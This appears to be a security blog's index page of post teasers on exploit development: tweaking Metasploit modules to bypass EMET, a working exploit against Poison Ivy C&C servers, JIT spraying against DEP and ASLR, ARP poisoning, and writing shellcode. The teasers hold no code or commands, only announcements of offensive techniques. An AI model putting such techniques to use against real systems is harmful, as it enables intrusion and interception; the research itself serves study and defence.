We continue our series of tweaking Metasploit modules to bypass EMET, without changing Metasploit’s payloads. Last time, we talked about bypassing EMET’s EAF using SEH. Since this technique may not necessarily fit your exploit, we present a second technique that bypasses EMET’s EAF without using SEH or changing Metasploit’s payload.
Continue reading
Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) is designed to increase the protection of your system against exploitation. It can render current Metasploit modules useless, as they’re currently not designed to bypass it. We discuss ways to tweak Metasploit modules in as much a generic way as possible, so they can work against targets utilizing EMET.
Continue reading
The official Poison Ivy Metasploit module has just been released. With the help of Juan Vazquez, the official module is a major upgrade to the original module I published. Here is some important information on how to use it.
Continue reading
We are proud to present a new, growing collection from IBadishi Digital Art (the sharpest of you might note the family relationship 
). The collection features hack-me shirts (try to hack them!), ASCII art, geek chic, and simply cool gear. You can see some samples below. We would also love to hear what you think and what cool designs you would like to see, so feel free to leave your comments below.
Continue reading
While working on Poison Ivy’s communication, one of my students approached me and asked me if the fact that an infected computer can connect to the C&C server means that the compromised host can break into the server. Well folks, it appears that it’s possible. We will now present a fully working exploit for all Windows platforms (i.e., bypassing DEP and ASLR), allowing a computer infected by Poison Ivy (or any other computer, for that matter) to assume control of PI’s C&C server.
Continue reading
Lately, hackers are forced to be more and more creative as defense mechanisms are piling up, making exploitation more difficult. Most notably, data execution prevention (DEP) and address space layout randomization (ASLR), both present on Windows 7 and current browsers, make drive-by exploits a real pain. In this post we explain the concept of using the Just-In-Time (JIT) compiler to bypass DEP and ASLR.
Continue reading
Every second Tuesday of the month, Microsoft releases a batch of security (and other) updates for its products. This is known as Patch Tuesday. Microsoft’s security updates for April 2012 contain several patches, one of them is described in security bulletin MS12-024. The bulletin talks about remote code execution through the use of specially-crafted, digitally-signed, portable executable (PE) files. The vulnerability is rated critical. To better understand what this is all about, we want to first see what a digitally-signed PE (using Windows Authenticode) looks like.
Continue reading
ARP-Poisoning is an attack that allows an attacker to become man-in-the-middle (MITM) in a local network, thereby making all traffic between two or more hosts on the network pass through the attacker. A MITM attacker can therefore see all the traffic between the victims, manipulate it, or drop it altogether. We now discuss how to perform the most basic ARP-poisoning attack using WinPcap.
Continue reading
A friend of mine owns a website that got broken into a couple of years ago. The site’s maintainer assured my friend at that time that he cleaned everything up, but that doesn’t mean the vulnerability doesn’t still exist. Not so long ago, I decided to take a look and see if the site can still get compromised.
Continue reading
As we’ve already explained before, exploiting a vulnerability involves triggering the vulnerability and then perhaps executing your code on the machine. The code that your exploit runs can do a variety of things, but originally it just opened a shell, hence the term shellcode. We now detail the basic procedures involved in creating the shellcode itself (not the whole exploit).
Continue reading